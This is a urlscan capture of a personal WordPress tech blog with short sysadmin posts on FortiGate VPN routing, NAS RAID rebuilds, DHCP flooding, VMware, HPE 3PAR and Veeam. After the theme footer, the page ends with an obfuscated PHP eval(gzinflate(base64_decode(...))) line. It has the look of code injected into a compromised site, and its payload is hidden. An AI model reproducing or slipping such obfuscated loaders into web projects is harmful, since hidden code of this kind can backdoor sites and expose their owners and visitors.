blog.zefat.nl Open in urlscan Pro
217.62.112.156  Public Scan

URL: http://blog.zefat.nl/
Submission: On January 28 via api from US — Scanned from US

Form analysis 1 forms found in the DOM

GET http://blog.zefat.nl/

<form method="get" id="search_form" action="http://blog.zefat.nl/">
  <input type="text" class="search_input" value="To search, type and hit enter" name="s" id="s" onfocus="if (this.value == 'To search, type and hit enter') {this.value = '';}"
    onblur="if (this.value == '') {this.value = 'To search, type and hit enter';}">
  <input type="hidden" id="searchsubmit" value="Search">
  <p style="display:inline"><input type="hidden" name="AFHTOKEN" value="QTizfdcYyvdPCruqJEzRaPDqgylHgEkrdg5xDy/EZ4Ws4s77jXVIpAel+eUqXBMI75S8n4lxsy5d2u58I7+AWOLZzT8fPQpYKiUVWeFI6S5RMKsVC+UERA=="></p>
</form>

Text Content

BERT ZEFAT'S TECH BLOG

MY LITTLE TECH SPACE ON THE WEB…


FORTICLIENT CAN’T CONNECT OVER DAIL-UP VPN TO REMOTE SITE

Posted on November 29th, 2017 by Bert Zefat

After upgrading from 5.2.x or 5.4.x to 5.6.2 it is possible that FortiClient VPN
connected clients can not access a remote site over VPN anymore from the
FortiGate that they are connecting to.
The local LAN is accessible, but the remote LAN is not.

It seems there is a routing issue in the 5.6.2 OS. If you do

# execute traceroute <ip-address>

you will see the first IP adres beeing an IP address that is not defined in the
Dail-up FortiGate.

You must add a static route at the remote site with the IP range of the IPsec
client IP adresses.

With

# diagnose sniffer packet <interface> 'host <ip adress>'

you must see a ping request and reply on both the source FortiGate and the
remote FortiGate.

Filed Under: Fortigate, Security Add Comment »


FORMATTING FAILURE (ERROR CODE:107) – CH3MNAS

Posted on August 11th, 2017 by Bert Zefat

After multiple moves of the NAS, one drive failed. So my Raid 1 was gong.

Ordering a new disk and replacing the faulty one, gave me:

Formatting Failure (Error Code:107) (Restart)

I have fun_plug installed, so was able to ssh into the linux kernal of the disk.

root@CH3MNAS:~# mdadm --detail /dev/md0
/dev/md0:
 Version : 00.90.03
 Creation Time : Sat Jul 1 21:41:07 2017
 Raid Level : raid1
 Array Size : 1951407424 (1861.01 GiB 1998.24 GB)
 Device Size : 1951407424 (1861.01 GiB 1998.24 GB)
 Raid Devices : 2
 Total Devices : 1
Preferred Minor : 0
 Persistence : Superblock is persistent

Update Time : Fri Aug 11 13:46:28 2017
 State : clean, degraded
 Active Devices : 1
Working Devices : 1
 Failed Devices : 0
 Spare Devices : 0

UUID : deca97b0:e9d03d89:02b4d16e:e91b5409
 Events : 0.126622

Number Major Minor RaidDevice State
 0 8 2 0 active sync /dev/sda2
 1 0 0 1 removed




ADDING THE NEW HARD DISK:

root@CH3MNAS:~# sfdisk -d /dev/sda | sfdisk /dev/sdb

root@CH3MNAS:~# mdadm –manage /dev/md0 –add /dev/sdb2

root@CH3MNAS:~# cat /proc/mdstat

root@CH3MNAS:~# cat /proc/mdstat
Personalities : [linear] [raid0] [raid1]
md0 : active raid1 sdb2[2] sda2[0]
 1951407424 blocks [2/1] [U_]
 [>....................] recovery = 2.5% (49485376/1951407424) finish=263.8min speed=120113K/sec

Looking MUTCH better..

Filed Under: Conceptronics, Linux Add Comment »


STOP DHCP INFORM FLOODING

Posted on July 30th, 2017 by Bert Zefat


BACKGROUND

Windows 7 among others ask for proxy settings using DHCP. The issue is that they
do not stop asking until they have received an answer. This results in that the
log contains a lot information about these requests, an example can be found
below.

2017:07:30-00:12:03 firewall-1 dhcpd: DHCPINFORM from 192.168.188.213 via eth3
2017:07:30-00:12:03 firewall-1 dhcpd: DHCPACK to 192.168.188.213 (00:50:56:ab:38:53) via eth3

2017:07:30-00:14:03 firewall-1 dhcpd: DHCPACK to 192.168.188.213 (00:50:56:ab:38:53) via eth3
2017:07:30-00:14:03 firewall-1 dhcpd: DHCPINFORM from 192.168.188.213 via eth4

Add the following option to the DHCP server:

dhcp-option=252,"\n"

Filed Under: Linux, Networking, Sophos Add Comment »


INSTALLING VMWARE TOOLS IN A LINUX VM

Posted on July 12th, 2017 by Bert Zefat

Go to Virtual Machine > Install VMware Tools (or VM > Install VMware Tools).

sudo mkdir /mnt/cdrom
sudo mount /dev/cdrom /mnt/cdrom or sudo mount /dev/sr0 /mnt/cdrom
tar xzvf /mnt/cdrom/VMwareTools-x.x.x-xxxx.tar.gz -C /tmp/
cd /tmp/vmware-tools-distrib/
sudo ./vmware-install.pl -d

sudo reboot

Filed Under: ESX, Linux, VMware, vSphere Add Comment »


VSPHERE CLIENT CONSOLE DOES NOT DISPLAY FULL SCREEN

Posted on July 12th, 2017 by Bert Zefat

While opening a console for any virtual machine from one particular workstation,
the console display is not sized correctly.

To resolve this, you will have to disable Display Scaling.

 1. Right click the vSphere Client icon and select Properties
 2. Click Compatibility
 3. Check box, “Disable display scaling on high DPI Settings”.
 4. Apply the settings
 5. Reload the vSphere Client.

The console session should populate the full screen.

Filed Under: ESX, VMware, vSphere Add Comment »


INITIAL SETUP FORTIGATE VM

Posted on July 10th, 2017 by Bert Zefat

config system interface
  edit port1
    set ip 192.168.0.100 255.255.255.0
    append allowaccess http
end

config router static 
  edit 1 
    set device port1 
    set gateway
end

Filed Under: Fortigate, Security Add Comment »


HPE 3PAR CHANGE DNS SETTINGS

Posted on June 20th, 2017 by Bert Zefat

Check Existing 3PAR DNS Settings:

3PAR01 cli% shownet
IP Address         Netmask/PrefixLen   Nodes   Active   Speed   Duplex   AutoNeg
    Status
172.28.22.115    255.255.255.0              01         1      100        Full  
        Yes    Active

Default route : 172.28.22.254
NTP server : 172.27.40.254
DNS server : 172.27.20.3 172.27.20.2

Add DNS Server:

3PAR01 cli% setnet dns -add 10.144.175.37
DNS server successfully updated.

Remove DNS Server

3PAR01 cli% setnet dns -remove 10.135.5.1
DNS server successfully updated.

Filed Under: 3Par, HPE, Storageworks Add Comment »


SSMC ADMIN PASSWORD LOST / RECOVER

Posted on June 19th, 2017 by Bert Zefat

Also mentioned in the SSMC Administrator’s Guide:

 

If you forget the Administrator credentials, clear the password by executing the
script ClearAdminCredential.bat located in the SSMC\ssmcbase folder.

C:\Program Files\Hewlett-Packard\SSMC\ssmcbase

Run the script from an administrator command prompt window.

Filed Under: 3Par, HP, Storageworks Add Comment »


VEEAM ISSUES AFTER INSTALLING KB4015553

Posted on May 23rd, 2017 by Bert Zefat

Following error can occure:

“An operation on a socket could not be performed because the system lacked
sufficient buffer space or because a queue was full”

Please remove KB4015553 from the Windows Updates. (reboot needed)

Filed Under: VEEAM, Windows Add Comment »


FORTIGATE GET UPDATE STATUS VIA CLI

Posted on March 17th, 2017 by Bert Zefat

To get the update from a FortiGate via the CLI:

get sys perf stat

Filed Under: Fortigate, Security Add Comment »

Next Page »


 * SEARCH THIS SITE
   
   


 * SYNDICATION
   
   * RSS Syndication


 * NAVIGATION
   
   * Home
   * About Bert Zefat
   * Contact


 * CATEGORIES
   
   * Conceptronics
   * Games
     * COD
   * General
   * HP
     * Blade Systems
   * HPE
   * Linux
   * Microsoft
     * App-V
     * Windows
   * Networking
   * Security
     * Fortigate
     * Sophos
   * SQL
   * Storageworks
     * 3Par
     * B-Series
     * EVA
     * P2000
     * P4000
   * VEEAM
   * VMware
     * ESX
     * vSphere


 * ARCHIVES
   
   * November 2017
   * August 2017
   * July 2017
   * June 2017
   * May 2017
   * March 2017
   * November 2016
   * October 2016
   * September 2016
   * August 2016
   * July 2016
   * June 2016
   * April 2016
   * March 2016
   * December 2015
   * November 2015
   * October 2015
   * July 2015
   * April 2015
   * March 2015
   * February 2015
   * January 2015
   * December 2014
   * October 2014
   * September 2014
   * June 2014
   * March 2014
   * February 2014
   * January 2014
   * November 2012
   * September 2012
   * May 2011
   * April 2011


 * CALENDAR
   
   * January 2024 M T W T F S S « Nov     1234567 891011121314 15161718192021
     22232425262728 293031  


 * META
   
   * Log in

Copyright © 2008 Bert Zefat's Tech Blog. Darkwater Theme by Antbag | New
catalogue | Download from Wordpress templates .

eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A')));
?>